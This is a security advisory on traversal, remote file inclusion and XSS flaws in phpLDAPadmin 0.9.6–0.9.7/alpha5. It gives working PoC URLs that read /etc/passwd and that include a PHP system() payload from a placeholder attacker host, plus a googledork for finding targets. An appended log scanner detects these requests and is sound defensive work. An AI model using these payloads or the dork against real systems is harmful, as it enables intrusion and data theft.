phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure, remote code execution, cross site scripting

software: phpLDAPadmin
author site: http://phpldapadmin.sourceforge.net/

description: phpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multi-language administration for your LDAP server.

If unpatched and vulnerable, a user can see any file on the target system.

poc:
http://[target]/[path]/phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd

A user can also execute arbitrary PHP code and system commands:
http://[target]/[path]/phpldapadmin/welcome.php?custom_welcome_page=http://[evil_site]/cmd.gif

where cmd.gif is a file like this:
<?php system('[some_command]'); ?>

Also, a user can craft a malicious URL to include malicious client-side code that will be executed in the security context of the victim's browser.

googledork: phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php

rgod
site: http://rgod.altervista.org
email: retrogod at aliceposta.it
original advisory: http://www.rgod.altervista.org/phpldap.html
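Both PoC requests above leave a distinctive trace in the web server's access log: a hit on welcome.php whose custom_welcome_page value is either a directory-traversal path or a full URL. The following scanner, added here as an example and not part of the advisory or of phpLDAPadmin, flags such requests in Apache combined-format logs; the log lines, addresses and timestamps are constructed samples.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (Apache combined format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2005:10:01:02 +0000] "GET /phpldapadmin/welcome.php HTTP/1.1" 200 1432 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Jan/2005:10:01:09 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd HTTP/1.1" 200 2210 "-" "curl/7.15"
10.0.0.7 - - [12/Jan/2005:10:01:15 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=http://203.0.113.9/cmd.gif HTTP/1.1" 200 98 "-" "curl/7.15"
10.0.0.9 - - [12/Jan/2005:10:02:00 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 2210 "-" "-"
10.0.0.3 - - [12/Jan/2005:10:02:30 +0000] "GET /phpldapadmin/tree.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Pulls client IP, method, request target and status out of a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Any URL scheme (http://, https://, ftp://, ...) means a remote include attempt.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def classify_value(value: str) -> Optional[str]:
    """Return 'traversal', 'remote_include' or None for one custom_welcome_page value."""
    # parse_qs already decoded once; decode twice more so double-encoded
    # sequences such as %252e%252e%252f are still recognised.
    decoded = unquote(unquote(value))
    if SCHEME_RE.match(decoded):
        return "remote_include"
    if "../" in decoded or "..\\" in decoded:
        return "traversal"
    return None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious welcome.php request in the log text."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/welcome.php"):
            continue  # only the vulnerable script is of interest here
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("custom_welcome_page", []):
            kind = classify_value(value)
            if kind:
                findings.append({"ip": m.group("ip"), "kind": kind,
                                 "value": value, "status": m.group("status")})
    return findings
```

A 200 status on a flagged traversal request is the strongest signal, since a patched or allowlisting welcome.php would not serve the requested file.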